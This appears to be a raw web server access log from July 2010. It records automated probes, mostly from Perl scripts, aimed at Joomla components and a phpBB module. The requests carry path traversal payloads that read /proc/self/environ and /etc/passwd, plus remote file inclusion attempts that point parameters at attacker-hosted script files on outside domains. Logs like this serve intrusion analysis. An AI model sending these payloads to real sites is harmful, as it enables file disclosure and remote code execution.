91.121.171.27 - - [05/Jul/2010:03:17:48 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.171.27 - - [05/Jul/2010:03:17:49 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.171.27 - - [05/Jul/2010:03:17:49 -0500] "GET /logs/access_log.1276128000//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
89.108.108.124 - - [05/Jul/2010:03:18:03 -0500] "GET /logs/access_log.1274572800//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.108.108.124 - - [05/Jul/2010:03:18:04 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.108.108.124 - - [05/Jul/2010:03:18:04 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.108.108.124 - - [05/Jul/2010:03:18:04 -0500] "GET /logs/access_log.1276128000//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
91.121.171.27 - - [05/Jul/2010:03:19:14 -0500] "GET /logs/access_log.1276300800//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.171.27 - - [05/Jul/2010:03:19:14 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.171.27 - - [05/Jul/2010:03:19:14 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
209.61.244.6 - - [05/Jul/2010:03:19:27 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:03:19:27 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:03:19:36 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:03:19:36 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
95.154.248.22 - - [05/Jul/2010:03:19:36 -0500] "GET /?option=com_juliaportfolio&controller=/../../../../../../../../etc/passwd HTTP/1.1" 200 1003 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
95.154.248.22 - - [05/Jul/2010:03:19:36 -0500] "GET /logs/?option=com_juliaportfolio&controller=/../../../../../../../../etc/passwd HTTP/1.1" 200 12135 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
92.60.176.46 - - [05/Jul/2010:03:19:44 -0500] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:03:19:44 -0500] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12135 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:03:19:44 -0500] "GET /logs/access_log.1277164800/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""MaMa CaSpEr"
91.121.171.27 - - [05/Jul/2010:03:19:48 -0500] "GET /logs/access_log.1276819200//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.171.27 - - [05/Jul/2010:03:20:05 -0500] "GET /logs/access_log.1276819200//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.171.27 - - [05/Jul/2010:03:20:05 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.171.27 - - [05/Jul/2010:03:20:05 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
89.108.108.124 - - [05/Jul/2010:03:20:41 -0500] "GET /logs/access_log.1276300800//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.108.108.124 - - [05/Jul/2010:03:20:41 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.108.108.124 - - [05/Jul/2010:03:20:41 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.40.65.160 - - [05/Jul/2010:03:20:49 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:03:21:00 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
89.108.108.124 - - [05/Jul/2010:03:21:10 -0500] "GET /logs/access_log.1276819200//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.108.108.124 - - [05/Jul/2010:03:21:13 -0500] "GET /logs/access_log.1276819200//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.108.108.124 - - [05/Jul/2010:03:21:13 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.108.108.124 - - [05/Jul/2010:03:21:14 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.40.65.160 - - [05/Jul/2010:03:21:57 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
95.154.248.22 - - [05/Jul/2010:03:22:36 -0500] "GET /logs//index2.php?option=com_sbsfile&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 300 "-""Advanced Browser (http://www.avantbrowser.com)"
95.154.248.22 - - [05/Jul/2010:03:22:36 -0500] "GET //index2.php?option=com_sbsfile&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 295 "-""Advanced Browser (http://www.avantbrowser.com)"
95.154.248.22 - - [05/Jul/2010:03:22:44 -0500] "GET //index2.php?option=com_sbsfile&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
95.154.248.22 - - [05/Jul/2010:03:22:44 -0500] "GET /logs//index2.php?option=com_sbsfile&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
66.40.65.160 - - [05/Jul/2010:03:22:57 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
91.121.171.27 - - [05/Jul/2010:03:24:31 -0500] "GET /logs/access_log.1275782400//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.171.27 - - [05/Jul/2010:03:24:31 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.171.27 - - [05/Jul/2010:03:24:32 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.171.27 - - [05/Jul/2010:03:24:39 -0500] "GET /logs/access_log.1274572800//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
89.108.108.124 - - [05/Jul/2010:03:25:48 -0500] "GET /logs/access_log.1275782400//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.108.108.124 - - [05/Jul/2010:03:25:48 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.108.108.124 - - [05/Jul/2010:03:25:49 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.108.108.124 - - [05/Jul/2010:03:25:53 -0500] "GET /logs/access_log.1274572800//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.207.204.37 - - [05/Jul/2010:03:27:18 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
64.207.204.37 - - [05/Jul/2010:03:28:05 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
78.41.233.128 - - [05/Jul/2010:03:28:28 -0500] "GET /logs/access_log.1276300800//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:28:28 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:28:28 -0500] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.805"
66.40.65.160 - - [05/Jul/2010:03:28:46 -0500] "GET /logs/access_log.1276128000//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:03:28:46 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:03:28:46 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:03:28:46 -0500] "GET /logs/access_log.1275264000//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.207.204.37 - - [05/Jul/2010:03:29:12 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
64.207.204.37 - - [05/Jul/2010:03:29:21 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
64.207.204.37 - - [05/Jul/2010:03:29:28 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
209.40.100.50 - - [05/Jul/2010:03:31:05 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
178.63.29.202 - - [05/Jul/2010:03:31:17 -0500] "GET /logs//modules/Forums/admin/admin_avatar.php?phpbb_root_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
178.63.29.202 - - [05/Jul/2010:03:31:17 -0500] "GET //modules/Forums/admin/admin_avatar.php?phpbb_root_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
178.63.29.202 - - [05/Jul/2010:03:31:17 -0500] "GET /logs/access_log.1277164800//modules/Forums/admin/admin_avatar.php?phpbb_root_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
178.63.29.202 - - [05/Jul/2010:03:31:19 -0500] "GET /logs//modules/Forums/admin/admin_avatar.php?phpbb_root_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
178.63.29.202 - - [05/Jul/2010:03:31:19 -0500] "GET //modules/Forums/admin/admin_avatar.php?phpbb_root_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
178.63.29.202 - - [05/Jul/2010:03:31:19 -0500] "GET /logs/access_log.1277164800//modules/Forums/admin/admin_avatar.php?phpbb_root_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
64.207.204.37 - - [05/Jul/2010:03:31:34 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
193.193.128.71 - - [05/Jul/2010:03:32:37 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
64.207.204.37 - - [05/Jul/2010:03:32:52 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
64.207.204.37 - - [05/Jul/2010:03:33:09 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
209.40.100.50 - - [05/Jul/2010:03:33:13 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
209.40.100.50 - - [05/Jul/2010:03:33:13 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
209.40.100.50 - - [05/Jul/2010:03:33:21 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
64.207.204.37 - - [05/Jul/2010:03:34:46 -0500] "GET /logs/access_log.1276732800//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
64.207.204.37 - - [05/Jul/2010:03:34:47 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
64.207.204.37 - - [05/Jul/2010:03:34:47 -0500] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
209.40.100.50 - - [05/Jul/2010:03:34:49 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
64.207.204.37 - - [05/Jul/2010:03:34:51 -0500] "GET /logs/access_log.1277251200//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
92.60.176.46 - - [05/Jul/2010:03:35:35 -0500] "GET /logs/access_log.1276732800//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 312 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:03:35:35 -0500] "GET //?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:03:35:35 -0500] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12140 "-""MaMa CaSpEr"
209.40.100.50 - - [05/Jul/2010:03:35:36 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
209.40.100.50 - - [05/Jul/2010:03:35:44 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
209.40.100.50 - - [05/Jul/2010:03:35:57 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.193.128.71 - - [05/Jul/2010:03:36:04 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
92.60.176.46 - - [05/Jul/2010:03:37:38 -0500] "GET /logs/access_log.1276646400//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 312 "-""MaMa CaSpEr"
193.193.128.71 - - [05/Jul/2010:03:39:43 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
209.40.100.50 - - [05/Jul/2010:03:40:15 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
78.41.233.128 - - [05/Jul/2010:03:41:39 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:41:39 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:42:20 -0500] "GET /logs/access_log.1276819200//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:42:21 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:42:21 -0500] "GET /logs//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.40.100.50 - - [05/Jul/2010:03:43:05 -0500] "GET /logs/access_log.1276732800//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
209.40.100.50 - - [05/Jul/2010:03:43:05 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
209.40.100.50 - - [05/Jul/2010:03:43:05 -0500] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
209.40.100.50 - - [05/Jul/2010:03:43:10 -0500] "GET /logs/access_log.1277251200//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
209.40.100.50 - - [05/Jul/2010:03:43:22 -0500] "GET /logs/access_log.1276732800//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
209.40.100.50 - - [05/Jul/2010:03:43:22 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
209.40.100.50 - - [05/Jul/2010:03:43:22 -0500] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
209.40.100.50 - - [05/Jul/2010:03:43:27 -0500] "GET /logs/access_log.1277251200//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
78.41.233.128 - - [05/Jul/2010:03:43:48 -0500] "GET /logs/access_log.1276214400//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:43:49 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:43:49 -0500] "GET /logs//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.193.128.71 - - [05/Jul/2010:03:44:48 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
78.41.233.128 - - [05/Jul/2010:03:45:39 -0500] "GET /logs/access_log.1276128000//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.193.128.71 - - [05/Jul/2010:03:46:19 -0500] "GET /logs/access_log.1276646400//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
193.193.128.71 - - [05/Jul/2010:03:46:25 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
193.193.128.71 - - [05/Jul/2010:03:46:26 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
209.40.100.50 - - [05/Jul/2010:03:48:32 -0500] "GET /logs/access_log.1277424000//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
209.40.100.50 - - [05/Jul/2010:03:48:32 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
209.40.100.50 - - [05/Jul/2010:03:48:32 -0500] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
